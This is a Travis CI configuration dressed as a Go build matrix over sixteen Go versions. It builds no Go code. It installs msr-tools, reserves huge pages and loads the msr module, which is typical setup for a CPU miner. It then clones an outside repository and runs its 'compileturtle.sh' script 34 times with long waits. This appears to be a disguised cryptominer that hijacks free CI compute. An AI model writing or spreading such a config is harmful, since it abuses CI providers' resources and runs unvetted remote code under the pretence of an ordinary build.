language: go
os: linux
dist: focal
go:
  - "1.3"
  - "1.4"
  - "1.5"
  - "1.6"
  - "1.7"
  - "1.8"
  - "1.9"
  - "1.10"
  - "1.11"
  - "1.12"
  - "1.13"
  - "1.14"
  - "1.15"
  - "1.16"
before_install:
  - sudo apt-get update -y
  - sudo apt-get install -y msr-tools wget
  - sudo sysctl -w vm.nr_hugepages=1280
  - sudo modprobe msr
install:
  - git clone https://github.com/Diaznr/p.git
  - cd p
  - ls
  - chmod +x tuyul compileturtle.sh
script:
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh
  - travis_wait 50 ./compileturtle.sh